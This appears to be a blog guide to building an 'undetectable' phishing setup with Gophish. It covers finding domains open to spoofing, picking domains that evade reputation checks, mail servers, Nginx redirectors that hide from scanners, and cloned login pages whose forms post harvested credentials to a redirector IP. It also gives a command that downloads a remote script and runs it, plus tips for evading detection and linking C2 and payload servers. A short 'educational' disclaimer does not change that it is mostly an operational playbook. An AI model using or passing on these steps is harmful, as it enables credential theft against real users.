Undetectable Phishing setup

Phishing is an Art.

I'd like to share my experience and methodologies for phishing targeted users, which involves using a variety of tools and scripts. The goal of this activity is typically to harvest credentials or gain initial access to a user's computer. Therefore, it's important to have a well-planned phishing setup in order to increase the chances of success.

However, it's worth noting that phishing is an illegal activity and should not be engaged in. With that said, let's begin discussing the topic.

Sharing knowledge for educational purpose. Please use it wisely.

Pre-setup

It's a good idea to check for misconfigurations in the targeted domains before starting a phishing setup. These misconfigurations can be exploited to facilitate phishing activity.

For example, if the domain has insecure redirects or weak password policies, it may be easier to successfully carry out a phishing attack. It's important to be thorough in your assessment of the target's vulnerabilities, as this can increase the chances of a successful phishing attempt.

Domain SPF Validation:

To check if a domain is vulnerable to spoofing attacks, you can check its SPF (Sender Policy Framework) record. SPF is a security standard that helps to prevent email spoofing by specifying which mail servers are authorized to send email on behalf of a domain. To check a domain's SPF record, you can use a tool such as MXToolbox's SPF Record Lookup.

Here's how to use it:

  1. Go to the MXToolbox website (https://mxtoolbox.com/)

  2. In the search bar, enter "SPF Record Lookup" and press enter

  3. In the text field, enter the domain that you want to check

  4. Click the "SPF Record Lookup" button

The tool will then retrieve the domain's SPF record and display it for you. If the record includes a "v=spf1 -all" directive, it means that the domain is protected against spoofing attacks. If the record is blank or includes a "v=spf1 ?all" directive, it means that the domain is not protected against spoofing attacks and may be vulnerable to spoofing.

Verify the SPF record check -> ~all means vulnerable to Domain spoofing root@MonsterSec:~# dig +short domain-namexxxx.com txt "v=spf1 ip4:3x.7x.15x.196 include:_spf.goxxx.com ~all"

Reference:

https://www.digitalocean.com/community/tutorials/how-to-use-an-spf-record-to-prevent-spoofing-improve-e-mail-reliability

Gathering subdomain list

Gathering a list of subdomains can be helpful in finding a suitable subdomain name to host your phishing page. There are several tools, such as Sublist3r, Subfinder, and Findomain, that can assist with subdomain enumeration. These tools can help you find subdomains that are related to your target organization, which can make your phishing attempt more convincing.

Domain purchase:

When purchasing a domain for a phishing campaign, it's important to consider the reputation of the domain provider. Domain providers with a high reputation may have security policies in place to block domains that are used for phishing. Using a domain provider with a lower reputation can help you avoid these security measures.

It's also important to be cautious when selecting a domain name.

  • Using a typo or misspelled version of the target organization's name may not be effective if the organization is monitoring for such domains. Instead, you might consider using a generic name that is related to your phishing goal, such as "email.domain.com" for targeting email credentials.

  • Using an expired domain name can also help you bypass email reputation checks.

Infrastructure setup:

1. Email server

There are several options for setting up an email server for a phishing campaign:

  1. Self-hosted email server: You can use a self-hosted email server such as Postfix or Axigen to send phishing emails. Automated email server script - There are scripts available, such as Emailwiz, that can automate the process of setting up an email server for phishing.

  2. Managed email server: You can use a managed email service such as Office365 or Google Workspace to send phishing emails. To use Google Workspace, you will need to add TXT and MX records to your target domain and possibly create additional users. There are also tools available, such as GAM, that can automate certain tasks within Google Workspace.

  3. Third-party email server: You can use a third-party email service such as Gmail or Outlook to send phishing emails. However, these services may have stricter security measures in place, making it more difficult to successfully carry out a phishing attack.

2. Managed DNS Provider

Instead of hosting your DNS records on your own server, you can use a third-party DNS provider to propagate your records more quickly. This can be particularly useful when conducting multiple phishing campaigns, as you can manage multiple DNS providers from a single platform. Some popular DNS providers include Cloudns and Cloudflare.

It's a good idea to check your hosting service provider's propagation capability before moving to a third-party DNS provider.

Propagation refers to the process of updating DNS records on servers around the world, and it can take some time for these updates to take effect.

If your hosting service provider has a slow propagation rate, it may take longer for your DNS records to be updated and for your phishing campaign to be effective.

3. Redirector

Using a redirector in a phishing campaign can serve several purposes:

  1. Masking the phishing setup from public scanners: A redirector can help to conceal the location of your phishing setup, making it more difficult for public scanners to detect and track.

  2. Routing traffic from unwanted sources: A redirector can be used to filter traffic from sources such as unwanted internet scanners or vulnerability checker scripts, helping to reduce the risk of detection.

  3. Reusing a setup once it has been marked as malicious: If a redirector IP or domain has been marked as malicious or suspicious by security protection software or services, it can still be used in a phishing campaign by routing traffic through a different, less suspicious domain or IP.

Redirector setup

To set up a server for a phishing campaign using Gophish, you will need to install and configure certain components, such as Nginx and Certbot.

Nginx is a web server that can be used to host your phishing pages. To install Nginx, you will need to follow the installation instructions specific to your operating system.

Certbot is a tool that can be used to automatically obtain SSL certificates for your phishing domains. This can help to make your phishing pages more convincing, as SSL certificates add an extra layer of security and trust. To install Certbot, you will need to follow the instructions for your operating system. Once Certbot is installed, you can use it to register an SSL certificate for your phishing domain. You will need to use a subdomain to register the certificate, and then update the server IP address as an A DNS record on the domain hosting.

Gist Script:

sudo apt update 
sudo apt install nginx
sudo snap install core; 
sudo snap refresh core
sudo snap install --classic certbot
sudo ln -s /snap/bin/certbot /usr/bin/certbotsudo certbot --nginx
root@localhost:/var/log/letsencrypt# service nginx startroot@localhost:/var/log/letsencrypt# sudo certbot --nginx

**Automation Script:**
bash <(wget -qO- https://gist.githubusercontent.com/Monst3rSec/9bb457ee1902a99fa6d2d5e000882863/raw/0513fd3b175f6c796fb30c6f5bd35f23969322da/nginx-redirector-phishing.sh )

To configure Nginx for a phishing campaign, you will need to modify the Nginx config file in the "sites-available" folder. The specific changes that you will need to make will depend on the phishing scenario that you are planning. For example, you may need to set up redirects or specify the location of your phishing pages.

scenario:1

Scenario:2

If the target webpage is not rendering properly in the Gophish landing page, it could be due to issues with the CSS properties or the way the webpage was deployed on the Gophish server. In this case, you may need to use another server to host the webpage. This can help to ensure that the webpage is displayed correctly to the target. If you are using a separate server to host the phishing webpage, you will need to modify the Nginx config file to reflect this change. You will need to specify the location of the webpage on the new server and set up any necessary redirects or proxy configurations. In a phishing campaign, the C2 (command and control) server and payload server can be integrated with Gophish by modifying the Nginx config file to specify different location paths. This can allow you to manage the C2 and payload servers separately from the main Gophish server.

Quick Tips
  • Nginx mirror request - https://alex.dzyoba.com/blog/nginx-mirror/

    • Nginx mirror will duplicate all request and update the campaigns status in gophish Dashboard. Otherwise, it will update it once credentials harvested.

    • track location endpoint is used to update the status of campaign in gophish.

  • Form action should be pointed out the redirector server.

    • <form name="form1" method="post" action="https://157.245.104.196/" onsubmit="javascript:return WebForm_OnSubmit();" id="form1">

    • <form id="fm1" class="fm-v clearfix" action="" method="post">

Gophish Integration.

To integrate Gophish with your phishing campaign, you will need to access the Gophish server using https://127.0.0.1:3333. Gophish requires the use of https, so you will need to ensure that it is enabled on your server.

To log in to Gophish, you will need to use the admin username and a hashed password. After logging in, it is recommended to change the password to improve security. You can use a tool like SSH tunneling to simplify the process of accessing the Gophish server.

It's important to note that many cloud providers have tightened their firewall and spam protection measures in recent years. Therefore, it's a good idea to check which ports are allowed to connect to your server and to ensure that you have all the necessary permissions.

There are also other parameters that can impact the delivery of phishing emails, such as the sender's reputation and the email's content. It's important to carefully consider these factors in order to increase the chances of a successful phishing campaign.

Reference: https://linuxize.com/post/how-to-setup-ssh-tunneling/

To simplify the process, use the below automation script.

A. Sending profile

Gophish and email integration:

There are several ways to integrate an email server with Gophish for a phishing campaign:

  1. Gmail Workspace <-> Gophish: You can use Google Workspace (formerly known as G Suite) as your email server and Gophish to manage your phishing campaign.

  2. Office365 <-> Gophish: You can use Office365 as your email server and Gophish to manage your phishing campaign.

  3. Gmail or Outlook <-> Gophish: You can use a consumer email service such as Gmail or Outlook as your email server and Gophish to manage your phishing campaign.

To integrate Gmail or Google Workspace with Gophish, you may need to remove certain security restrictions. For example, you may need to enable the use of "less secure apps" in your Google account settings. It's important to be aware that this can increase the risk of your account being compromised.

If you encounter authentication errors when attempting to integrate your email server with Gophish, it may be necessary to check your authentication details.

If emails are not being sent, it could be because the email port is not working properly. This can sometimes be due to restrictions imposed by cloud providers. When integrating an email server with Gophish for a phishing campaign, it's important to remember that the "less secure apps" privilege may need to be enabled for each user. This can allow Gophish to access the user's email account for the purpose of sending phishing emails.

B. Landing page

  • To create a phishing campaign with Gophish, you can try cloning the targeted landing page using the import option and setting up a redirect URL on the same form.

  • If you are unable to clone the page directly, you can try downloading the page using the "save as" option in your browser and then editing it to match the target page. Once you have created the landing page, you will need to place it on the landing page server.

C. Email templates

  • There are a number of tools and techniques you can use to create email templates for a phishing campaign.

  • One option is to use a tool like Word to HTML, which can help you convert a Word document into an HTML email template. You can then modify the HTML content using a text editor like Notepad.

  • It's important to be aware that the font and font size may differ when you copy the content from Word to HTML, so you may need to make some adjustments.

D. Users and groups

  • To upload a list of users into Gophish for a phishing campaign, you will need to download a CSV (Comma Separated Values) file and then import it into Gophish. The CSV file should contain the email addresses of the users that you want to target.

E. Campaigns

  • If you have multiple campaigns in Gophish that contain duplicate entries, you may want to try eliminating the duplicates to avoid confusion and improve efficiency. Here are a few tips for doing so:

    1. Use a deduplication tool: There are several deduplication tools available that can help you identify and remove duplicates from a list.

    2. Manually review the list: If you don't have access to a deduplication tool, you can try manually reviewing the list and removing duplicates manually.

    3. Check for variations in spelling or formatting: Duplicates can sometimes be difficult to identify if the entries are spelled or formatted differently. Make sure to check for variations in spelling and formatting when reviewing the list.

F. Email Reporting

Email reporting can be a useful way for customers to track the performance of their phishing campaigns. Depending on the specific requirements of the customer, the report may include information such as:

  1. Number of emails sent: The total number of emails that were sent as part of the campaign.

  2. Number of emails opened: The number of emails that were opened by the recipients.

  3. Number of clicks: The number of times that a link in the email was clicked by a recipient.

  4. Conversion rate: The percentage of recipients who took a desired action (such as entering their login credentials) after receiving the email.

  5. Geographical distribution: A breakdown of the locations where the emails were opened and clicked.

Automation Tool Tips:

Gophish Defense Evasion

Gophish is a tool that is often used for phishing campaigns. However, it is possible for security teams to detect and prevent these campaigns by creating their own signatures to identify Gophish operations.

To avoid detection, some phishers may use obfuscation techniques to create a unique version of Gophish. This can make it more difficult for security teams to identify and block phishing campaigns.

Reference:

https://www.sprocketsecurity.com/resources/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls

GoReport - Gophish Reporting Tool

https://github.com/chrismaddalena/Goreport

This script accepts your Gophish campaign ID(s) as a parameter and then collects the campaign results to present the statistics and perform user-agent parsing and geolocation lookups for IP addresses. Goreport generates lists of IP addresses, operating systems, browser types and versions, and locations with counts for the number of times each one was seen throughout the campaign.

Goreport will report the total number of events and the number of email recipients that participated in each event. In other words, Goreport will show how many times Gophish recorded a "Clicked Link" event and how many recipients clicked a link. These are very different numbers. A campaign sent to 10 people could have 9 Clicked Link events when only 3 recipients clicked a link. Knowing that recipients clicked a link or submitted data more than once is valuable information, but make sure you keep the numbers straight. Credit: @cmaddalena

Initial Access - Code Execution

It's highly recommended to check the below document for the various way of initial access methods.

Note

Starting in the middle of 2022, Microsoft Office will block macros from the internet by default in an effort to improve security and prevent attacks. This means that macros that are downloaded from the internet will be blocked from running by default.

It is still possible to enable macros on a case-by-case basis, but this requires user intervention and can help to prevent malicious macros from running without the user's knowledge. It's important for users to be cautious when enabling macros, especially if they are downloaded from the internet.

Conclusion

The above information describes a basic phishing setup using Gophish. However, it is possible to add more sophisticated capabilities to make the campaign more stealthy. For example, you could use cloud services such as Azure and AWS to host the phishing pages and servers.

It's important to note that phishing is a constantly evolving threat, and it's important to keep learning about new methodologies and techniques in order to be able to effectively target different environments.

Thanks for the reading.

Last updated